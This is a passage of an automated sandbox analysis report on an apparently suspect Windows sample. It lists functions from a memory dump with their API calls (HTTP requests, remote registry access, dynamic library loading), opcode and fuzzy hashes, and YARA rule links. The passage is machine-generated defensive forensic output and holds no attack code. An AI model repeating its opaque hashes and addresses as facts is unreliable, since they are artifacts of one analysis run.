                                                                                                                                                                      • Instruction Fuzzy Hash: 5A31817060066AAFCF16EF55C8819EEB3B4FF05310B11872AE865AB7D1DB75A905CB80
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C9372, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00377F41: _memmove.LIBCMT ref: 00377F82
                                                                                                                                                                        • Part of subcall function 003CB0C4: GetClassNameW.USER32 ref: 003CB0E7
                                                                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003C93F6
                                                                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003C9409
                                                                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 003C9439
                                                                                                                                                                        • Part of subcall function 00377D2C: _memmove.LIBCMT ref: 00377D66
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$_memmove$ClassName
                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                      • API String ID: 365058703-1403004172
                                                                                                                                                                      • Opcode ID: 4a06e113b7db350e0d595fa960e9044be9ec2129ac22f8939ce21104e5c28795
                                                                                                                                                                      • Instruction ID: 235bd466890a8388168e07341bb134232985cd96a3c4894e02bb8bc27f9d8d4c
                                                                                                                                                                      • Opcode Fuzzy Hash: 4a06e113b7db350e0d595fa960e9044be9ec2129ac22f8939ce21104e5c28795
                                                                                                                                                                      • Instruction Fuzzy Hash: A921C371900104AEDB2AAB61DC89EFEB76CDF05350F11812AF9259B2E0DB394D0AD710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E1B21, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003E1B40
                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003E1B66
                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003E1B96
                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003E1BDD
                                                                                                                                                                        • Part of subcall function 003E2777: GetLastError.KERNEL32(?,?,003E1B0B,00000000,00000000,00000001), ref: 003E278C
                                                                                                                                                                        • Part of subcall function 003E2777: SetEvent.KERNEL32(?,?,003E1B0B,00000000,00000000,00000001), ref: 003E27A1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3113390036-3916222277
                                                                                                                                                                      • Opcode ID: 4713116b21d5eb6017eb9d008a03e89dcd208132856f8e666533f4ddb145c05d
                                                                                                                                                                      • Instruction ID: 52895ed79313d435a49703c25c6667ed9d97667a3ca3e7c3bf017ca4380a8519
                                                                                                                                                                      • Opcode Fuzzy Hash: 4713116b21d5eb6017eb9d008a03e89dcd208132856f8e666533f4ddb145c05d
                                                                                                                                                                      • Instruction Fuzzy Hash: 8F2192B1500259BFEB139F629C85EBF77ECEB49784F10422AF505A6280EB309D059771
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F6656, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00371D35: CreateWindowExW.USER32 ref: 00371D73
                                                                                                                                                                        • Part of subcall function 00371D35: GetStockObject.GDI32(00000011), ref: 00371D87
                                                                                                                                                                        • Part of subcall function 00371D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00371D91
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003F66D0
                                                                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 003F66D7
                                                                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003F66EC
                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 003F66F4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                                      • String ID: SysAnimate32
                                                                                                                                                                      • API String ID: 4146253029-1011021900
                                                                                                                                                                      • Opcode ID: 4353833874dd093a430351c8cd24312c8cbfeab1afef11640eff66578990c3db
                                                                                                                                                                      • Instruction ID: 9c0663e729abf2795ffccbc3a0c9a45a65ad24a20b12981fa170ceeb91694d4d
                                                                                                                                                                      • Opcode Fuzzy Hash: 4353833874dd093a430351c8cd24312c8cbfeab1afef11640eff66578990c3db
                                                                                                                                                                      • Instruction Fuzzy Hash: A621AC7120020ABFEF125F64EC82EBB77ADEF59368F114629FA10D61A0DB72CC519760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D703E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 003D705E
                                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003D7091
                                                                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 003D70A3
                                                                                                                                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003D70DD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateHandle$FilePipe
                                                                                                                                                                      • String ID: nul
                                                                                                                                                                      • API String ID: 4209266947-2873401336
                                                                                                                                                                      • Opcode ID: 0de66c56fd5b7c7358ad330b13be1a7f23eba5aa1c952a8449cd7dd104067159
                                                                                                                                                                      • Instruction ID: 31dd57c3db29b2b604e72554f4990f9fc0ae6c90dfa3360d2af7fb7f815b1589
                                                                                                                                                                      • Opcode Fuzzy Hash: 0de66c56fd5b7c7358ad330b13be1a7f23eba5aa1c952a8449cd7dd104067159
                                                                                                                                                                      • Instruction Fuzzy Hash: 68213276504209AFDB219F39EC05BAA77B8BF54724F204A1AFDA1D73D0E7709950CB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D710C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 003D712B
                                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003D715D
                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 003D716E
                                                                                                                                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003D71A8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateHandle$FilePipe
                                                                                                                                                                      • String ID: nul
                                                                                                                                                                      • API String ID: 4209266947-2873401336
                                                                                                                                                                      • Opcode ID: f3ef23bcc9ba6ebbf0fa1a8f688dbb2256e688f10f103de84bcc343114faf962
                                                                                                                                                                      • Instruction ID: 105bb4185def325aa007d705be3f518a84c3389f7c9b2943d27ec9e0e9d6f140
                                                                                                                                                                      • Opcode Fuzzy Hash: f3ef23bcc9ba6ebbf0fa1a8f688dbb2256e688f10f103de84bcc343114faf962
                                                                                                                                                                      • Instruction Fuzzy Hash: 42218676904215ABDB229F68EC05AA977ECAF55720F200B1AFDB1D73D0E7709851CB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DAEAB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 003DAEBF
                                                                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003DAF13
                                                                                                                                                                      • __swprintf.LIBCMT ref: 003DAF2C
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,003FF910), ref: 003DAF6A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                      • String ID: %lu
                                                                                                                                                                      • API String ID: 3164766367-685833217
                                                                                                                                                                      • Opcode ID: 34478c26229be6c8941d71df6fda8cc874f402d450697016da50d2ef8490c643
                                                                                                                                                                      • Instruction ID: 476673a921e3e3eeb8fa0815036124dd17d625740c0f87fc6008e32d8c2b29e8
                                                                                                                                                                      • Opcode Fuzzy Hash: 34478c26229be6c8941d71df6fda8cc874f402d450697016da50d2ef8490c643
                                                                                                                                                                      • Instruction Fuzzy Hash: 0C216035A00109AFCB11EB64DD85EAE7BB8EF89704B1040A9F909EB351DB71EA41CB21
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CA52F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00377D2C: _memmove.LIBCMT ref: 00377D66
                                                                                                                                                                        • Part of subcall function 003CA37C: SendMessageTimeoutW.USER32 ref: 003CA399
                                                                                                                                                                        • Part of subcall function 003CA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 003CA3AC
                                                                                                                                                                        • Part of subcall function 003CA37C: GetCurrentThreadId.KERNEL32 ref: 003CA3B3
                                                                                                                                                                        • Part of subcall function 003CA37C: AttachThreadInput.USER32(00000000), ref: 003CA3BA
                                                                                                                                                                      • GetFocus.USER32(003FF910), ref: 003CA554
                                                                                                                                                                        • Part of subcall function 003CA3C5: GetParent.USER32(?), ref: 003CA3D3
                                                                                                                                                                      • GetClassNameW.USER32 ref: 003CA59D
                                                                                                                                                                      • EnumChildWindows.USER32 ref: 003CA5C5
                                                                                                                                                                      • __swprintf.LIBCMT ref: 003CA5DF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                                                      • String ID: %s%d
                                                                                                                                                                      • API String ID: 1941087503-1110647743
                                                                                                                                                                      • Opcode ID: 073b85cafc68f5341d87a189b18dc8b658ff8c0e34c3bfd29af84cf9c1d728da
                                                                                                                                                                      • Instruction ID: 505625e9b7eccf8b0b0c2b9eddbdeb080ce46f60d849d6aa38a6f203f5f95503
                                                                                                                                                                      • Opcode Fuzzy Hash: 073b85cafc68f5341d87a189b18dc8b658ff8c0e34c3bfd29af84cf9c1d728da
                                                                                                                                                                      • Instruction Fuzzy Hash: CB119D75200208ABDF22BF60DC85FEA776CAF48704F044079BE08EA152CA745D559B79
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D2017, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 003D2048
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                                                      • API String ID: 3964851224-769500911
                                                                                                                                                                      • Opcode ID: c58df167239d859029b267db426f39af98800657428718f3677ad92d9f94c159
                                                                                                                                                                      • Instruction ID: 25953423b140903f7d936bf3386832b7c6ac7fb0cf7435118f29e617ecfa5ff2
                                                                                                                                                                      • Opcode Fuzzy Hash: c58df167239d859029b267db426f39af98800657428718f3677ad92d9f94c159
                                                                                                                                                                      • Instruction Fuzzy Hash: D511AD71900119CFCF05EFA4E8804FEB3B4FF25300F54886AD855AB352EB32691ACB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003EEE69, Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003EEF1B
                                                                                                                                                                      • GetProcessIoCounters.KERNEL32 ref: 003EEF4B
                                                                                                                                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 003EF07E
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 003EF0FF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2364364464-0
                                                                                                                                                                      • Opcode ID: 2f2fb88fb44343f815803bbd0cf02ebedbc037a50440aace6a831f55a2ccded9
                                                                                                                                                                      • Instruction ID: 2831c8c499d38b93848d07cdbe2d0fd1da3c2091bd269b3f03242ec7f0f107d6
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f2fb88fb44343f815803bbd0cf02ebedbc037a50440aace6a831f55a2ccded9
                                                                                                                                                                      • Instruction Fuzzy Hash: 9C8183716003119FD721DF25C886F6AB7E5AF88720F04892EF999DB2D2DBB4AC00CB51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0039564D, Relevance: 7.7, APIs: 5, Instructions: 163COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1559183368-0
                                                                                                                                                                      • Opcode ID: fd1a262b7e6f1cb596d0076786feeeb097306c284ce0f321d4276a437e8c5e71
                                                                                                                                                                      • Instruction ID: 867e185222bb2e958cc8986e41a1f20d1e84a8442bba01a19ec4f544613add07
                                                                                                                                                                      • Opcode Fuzzy Hash: fd1a262b7e6f1cb596d0076786feeeb097306c284ce0f321d4276a437e8c5e71
                                                                                                                                                                      • Instruction Fuzzy Hash: 8151A031A00B05DFDF279FB9C88466EB7B5AF41320F658729F8359A6D0D7709E918B40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F02C2, Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00377F41: _memmove.LIBCMT ref: 00377F82
                                                                                                                                                                        • Part of subcall function 003F10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003F0038,?,?), ref: 003F10BC
                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003F0388
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003F03C7
                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003F040E
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 003F043A
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 003F0447
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3440857362-0
                                                                                                                                                                      • Opcode ID: b9b210832c6c6ff5962e89b9d771079122a80db76ab042e8cd5e57d249ce6cb7
                                                                                                                                                                      • Instruction ID: 1523956e52320fdfb3611dbf88318aece7ff3d2ce7314c0b161cc32830eb52ee
                                                                                                                                                                      • Opcode Fuzzy Hash: b9b210832c6c6ff5962e89b9d771079122a80db76ab042e8cd5e57d249ce6cb7
                                                                                                                                                                      • Instruction Fuzzy Hash: 09514D75108205AFD716EF58D881F7AB7E8FF84304F44892EF6959B292DB34E904CB52
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003EDBDC, Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00379997: __itow.LIBCMT ref: 003799C2
                                                                                                                                                                        • Part of subcall function 00379997: __swprintf.LIBCMT ref: 00379A0C
                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 003EDC3B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 003EDCBE
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 003EDCDA
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 003EDD1B
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 003EDD35
                                                                                                                                                                        • Part of subcall function 00375B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003D7B20,?,?,00000000), ref: 00375B8C
                                                                                                                                                                        • Part of subcall function 00375B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003D7B20,?,?,00000000,?,?), ref: 00375BB0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 327935632-0
                                                                                                                                                                      • Opcode ID: dfd2c3a833533c19028e0f78286c7a5ccc12b97010f4fd62b7b510d20e427545
                                                                                                                                                                      • Instruction ID: 02d6ca04633032919d07ecbce9b023fa80ea23003c36812d32d686ee7687e6da
                                                                                                                                                                      • Opcode Fuzzy Hash: dfd2c3a833533c19028e0f78286c7a5ccc12b97010f4fd62b7b510d20e427545
                                                                                                                                                                      • Instruction Fuzzy Hash: ED514635A00215DFCB12EF68C8849ADB7F8EF48320B15C16AE819AB351DB74AD45CF81
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DE7DC, Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32 ref: 003DE88A
                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32 ref: 003DE8B3
                                                                                                                                                                      • WritePrivateProfileSectionW.KERNEL32 ref: 003DE8F2
                                                                                                                                                                        • Part of subcall function 00379997: __itow.LIBCMT ref: 003799C2
                                                                                                                                                                        • Part of subcall function 00379997: __swprintf.LIBCMT ref: 00379A0C
                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003DE917
                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003DE91F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1389676194-0
                                                                                                                                                                      • Opcode ID: 31240cb5bf020fb6884dd73f2382927fab041f50da07d7ad1a52826a5382a2e0
                                                                                                                                                                      • Instruction ID: 311dab52e2c2759b9f1dc59ebae8db44bba8fc21225e882f7469bf8fdbdfedb0
                                                                                                                                                                      • Opcode Fuzzy Hash: 31240cb5bf020fb6884dd73f2382927fab041f50da07d7ad1a52826a5382a2e0
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A511D35A00205EFDF16EF64C981A6DBBF5EF49310B1480A9E949AF361CB35ED11DB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003FA2C5, Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
